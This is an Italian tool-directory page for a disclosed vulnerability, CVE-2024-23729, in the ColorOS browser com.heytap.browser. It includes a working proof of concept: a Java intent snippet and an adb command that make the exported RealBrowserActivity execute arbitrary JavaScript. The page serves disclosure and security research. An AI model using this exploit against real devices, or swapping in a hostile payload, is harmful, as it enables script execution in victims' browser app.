Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
com.heytap.browser — CVE-2024-23729 | Kitploit
Strumenti/GitHubGitHub/actuator/com.heytap.browser
Sicurezza AndroidAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza Mobile
GitHubactuator/com.heytap.browser

com.heytap.browser

CVE-2024-23729

Vedi Repository
81 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Rapporto sulla Vulnerabilità

Panoramica:

È stata scoperta una vulnerabilità nell'applicazione com.heytap.browser sulla piattaforma Android. La vulnerabilità consente a un attaccante di eseguire codice JavsScript arbitrario nel contesto dell'applicazione senza alcun permesso.

Dettagli dell'Applicazione:

  • Fornitore: - ColorOS
  • Nome dell'Applicazione: 'Internet Browser' com.heytap.browser
  • Versione: 45.10.3.4.1
  • Componente: com.android.browser.RealBrowserActivity

Dettagli della Vulnerabilità:

  • Tipo di Vulnerabilità: Esecuzione di Codice JavaScript
  • Vettore di Attacco: Tramite un componente activity esportato
  • Permessi Richiesti: Nessuno

Descrizione:

L'activity com.android.browser.RealBrowserActivity nell'app com.heytap.browser è esportata e può essere invocata da qualsiasi applicazione di terze parti senza richiedere alcun permesso. Un'app dannosa può sfruttare questa vulnerabilità per eseguire codice JavaScript arbitrario nel contesto dell'applicazione `com.heytap.browser``.

Prova di Concetto (PoC):

root@kitploit:~
{
        super.onCreate(savedInstanceState);

        String javaScriptCommand = "javascript:alert%28%27Test%20Alert%27%29%3B";

        Intent intent = new Intent(Intent.ACTION_VIEW);
        intent.setData(Uri.parse(javaScriptCommand));
        intent.setClassName("com.heytap.browser", "com.android.browser.RealBrowserActivity");

        startActivity(intent);

        finish();
    }
root@kitploit:~

adb shell am start -a android.intent.action.VIEW -d "javascript:alert%28%27Test%20Alert%27%29%3B" -n com.heytap.browser/com.android.browser.RealBrowserActivity

com heytap browser- 45 10 3 4 1-JS poc-coloros

Impatto:

Lo sfruttamento riuscito consente a un attaccante di:

  • Eseguire codice JavaScript arbitrario nel contesto dell'app com.heytap.browser.
Scarica lo strumento